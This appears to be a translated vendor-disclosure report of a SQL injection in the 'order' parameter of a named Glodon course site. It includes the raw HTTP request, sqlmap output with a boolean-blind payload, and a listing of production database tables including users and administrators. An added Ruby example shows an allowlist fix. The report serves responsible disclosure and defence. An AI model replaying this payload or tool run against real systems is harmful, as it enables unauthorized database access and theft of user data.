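2015-12-22: Details reported to the vendor; awaiting vendor handling
2015-12-22: Vendor has confirmed; details disclosed only to the vendor
2016-01-01: Details disclosed to core white hats and experts in related fields
2016-01-11: Details disclosed to regular white hats
2016-01-21: Details disclosed to intern white hats
2016-02-04: Details disclosed to the public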
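Saw the vendor say they were giving out gifts, and instantly felt motivated.
The event has ended, but the user information was left behind....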
GET /courses?order=*&page=3 HTTP/1.1
X-Forwarded-For: 8.8.8.8'
X-Requested-With: XMLHttpRequest
Referer: http://haosy.glodon.com:80/
Cookie: _rails_ds2015_session=BAh7CEkiD3Nlc3Npb25faWQGOgZFRkkiJTA4MWNkYzQzYzllNDRjNzVjMGI0Y2M4ZjgwYTFiYjdmBjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMU9sUkNFVGZ0NXpWUkR4dWtETkIxSlZTVDQyUGhENHRaMTZodGRETjJSQXM9BjsARkkiE3VzZXJfcmV0dXJuX3RvBjsARiIRL2NvdXJzZXMvMjU0--c096628d995d45729926319bff7b8cc0a3068a4e
Host: haosy.glodon.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
The order parameter is injectable.
Database: ds2015_production
+---------------------------+---------+
| Table                     | Entries |
+---------------------------+---------+
| score_logs                | 2046715 |
| vote_logs                 | 1421749 |
| fight_papers              | 417146  |
| papers                    | 194765  |
| course_logs               | 53751   |
| exam_specialty_statistics | 39498   |
| users                     | 36065   |
| fight_exams               | 33924   |
| sign_ins                  | 24789   |
| download_logs             | 23317   |
| scores                    | 13116   |
| yyc_statistics            | 12528   |
| game_chances              | 11859   |
| exams                     | 7793    |
| notices                   | 4377    |
| zones                     | 3218    |
| yysz_statistic_details    | 2941    |
| questions                 | 2496    |
| comments                  | 1544    |
| assets                    | 1335    |
| projects                  | 1205    |
| articles                  | 1055    |
| videos                    | 679     |
| administrator_affiliates  | 553     |
| courses                   | 306     |
| permission_events         | 88      |
| events                    | 83      |
| administrators            | 73      |
| administrator_permissions | 64      |
| award_records             | 63      |
| sessions                  | 41      |
| affiliates                | 40      |
| awards                    | 39      |
| question_files            | 26      |
| chapters                  | 11      |
| official_materials        | 10      |
| areas                     | 7       |
| games                     | 4       |
| permissions               | 3       |
| announcements             | 2       |
| youku_tokens              | 1       |
+---------------------------+---------+

[13:52:28] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2366 times, 502 (Bad Gateway) - 31 times
[13:52:28] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\haosy.glodon.com'

[*] shutting down at 13:52:28
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 41 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: http://haosy.glodon.com:80/courses?order=(SELECT (CASE WHEN (4871=4871) THEN 4871 ELSE 4871*(SELECT 4871 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&page=3
---
[13:16:22] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
[13:16:22] [INFO] fetching database names
[13:16:22] [INFO] fetching number of databases
[13:16:22] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[13:16:22] [INFO] retrieved: 2
[13:16:26] [INFO] retrieved:
[13:16:30] [INFO] heuristics detected web page charset 'ascii'
information_schema
[13:17:50] [INFO] retrieved: ds2015_production
available databases [2]:
[*] ds2015_production
[*] information_schema

[13:19:25] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 162 times, 502 (Bad Gateway) - 1 times
[13:19:25] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\haosy.glodon.com'

[*] shutting down at 13:19:25
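Added example (not code from this report or from the vendor's application): the session cookie name in the request suggests a Rails application, so this Ruby example places the vulnerable ORDER BY shape beside an allowlisted one and runs the payload sqlmap reported through both. The column names, the default ordering, the LIMIT and all function names are assumptions.

```ruby
# Added example, not the application's code. Column names, the default
# ordering and all function names are assumptions for illustration.
SORTABLE = {                      # request value => real column
  "created_at" => "courses.created_at",
  "title"      => "courses.title",
  "views"      => "courses.view_count"
}.freeze
DIRECTIONS    = { "asc" => "ASC", "desc" => "DESC" }.freeze
DEFAULT_ORDER = "courses.created_at DESC"
MAX_TERMS     = 3

# Vulnerable shape: the raw parameter becomes part of the SQL text.
# ORDER BY accepts expressions, so a subquery placed here is evaluated.
def unsafe_order_sql(param)
  "SELECT * FROM courses ORDER BY #{param} LIMIT 20"
end

# Hardened shape: parse "col [dir][,col [dir]...]" and emit only fragments
# taken from the constants above. Returns nil if any term is not recognised.
def parse_order(param)
  terms = param.to_s.split(",", -1)
  return nil if terms.empty? || terms.size > MAX_TERMS
  seen = {}
  clauses = terms.map do |term|
    col, dir, extra = term.strip.downcase.split(/\s+/, 3)
    return nil if extra || !SORTABLE.key?(col) || seen[col]
    return nil unless dir.nil? || DIRECTIONS.key?(dir)
    seen[col] = true
    "#{SORTABLE[col]} #{DIRECTIONS.fetch(dir || 'asc')}"
  end
  clauses.join(", ")
end

# Unknown input never reaches the query; the default ordering is used instead.
def safe_order_sql(param)
  "SELECT * FROM courses ORDER BY #{parse_order(param) || DEFAULT_ORDER} LIMIT 20"
end

# The payload sqlmap reported for this endpoint, as shown in its output above.
REPORTED = "(SELECT (CASE WHEN (4871=4871) THEN 4871 ELSE 4871*" \
           "(SELECT 4871 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))"

if __FILE__ == $PROGRAM_NAME
  puts unsafe_order_sql(REPORTED)        # subquery lands inside the statement
  puts safe_order_sql(REPORTED)          # falls back to DEFAULT_ORDER
  puts safe_order_sql("views desc,title")
end
```

Bound parameters cannot stand in for column names or sort direction, which is why the ORDER BY value has to be mapped through an allowlist rather than passed as a placeholder.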
Severity: High
Vulnerability Rank: 15
Confirmed: 2015-12-22 14:31
We are working on it. Thank you for submitting the vulnerability.
None yet